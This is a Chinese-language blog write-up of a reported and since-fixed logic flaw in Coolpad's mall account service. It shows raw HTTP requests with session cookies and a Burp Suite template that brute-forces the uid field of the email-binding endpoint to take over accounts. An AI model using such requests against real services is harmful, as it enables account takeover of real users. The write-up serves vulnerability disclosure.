酷派商城逻辑漏洞爆破用户密码

作者: Luan 分类: 渗透测试 发布时间: 2017-03-29 18:58

官方已经修复,我把思路分享一下。

提交时间: 2016年7月30日 12:48

漏洞评分: 4

在 http://passport.ivvicloud.com/ucenter/ 这里设置邮箱的地方抓包:

POST /extra/bindemail HTTP/1.1
Host: passport.ivvicloud.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://passport.ivvicloud.com/ucenter/index.jsp
Content-Length: 77
Cookie: JSESSIONID=2BA007B434A61BC2C690092DF928A4C6.v10; Hm_lvt_969545fe9dec17f3add2d7380daecfe1=1469833193,1469834901,1469850073; Hm_lpvt_969545fe9dec17f3add2d7380daecfe1=1469850073; CYUID=66138894; CYUSS=e773b501e2768f3b79cd2d5dd7cd2fad68butez8opbs2rdambch8qlngy1eaqp1
Connection: keep-alive

email=luantest_ok@chacuo.net&uid=1112326&pwd=e10adc3949ba59abbe56e057f20f883e

 

其中的POST参数:

email是你要绑定的邮箱,必须是没有注册过的。我这里测试漏洞是使用的临时邮箱:luantest_ok@chacuo.net (http://24mail.chacuo.net/)

UID就是用户的ID!

PWD则是32位MD5加密后的密码

我这里是使用的123456

这里没有验证码

爆破测试:

POST /extra/bindemail HTTP/1.1
Host: passport.ivvicloud.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://passport.ivvicloud.com/ucenter/index.jsp
Content-Length: 78
Cookie: JSESSIONID=2BA007B434A61BC2C690092DF928A4C6.v10; Hm_lvt_969545fe9dec17f3add2d7380daecfe1=1469833193,1469834901,1469850073; Hm_lpvt_969545fe9dec17f3add2d7380daecfe1=1469850073; CYUID=66138894; CYUSS=e773b501e2768f3b79cd2d5dd7cd2fad68butez8opbs2rdambch8qlngy1eaqp1
Connection: keep-alive

email=luantest5678@chacuo.net&uid=§a§&pwd=e10adc3949ba59abbe56e057f20f883e

用Burpsuite的爆破功能测试

我测试的账号:

luantest_ok@chacuo.net

密码 123456

登录商城:

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注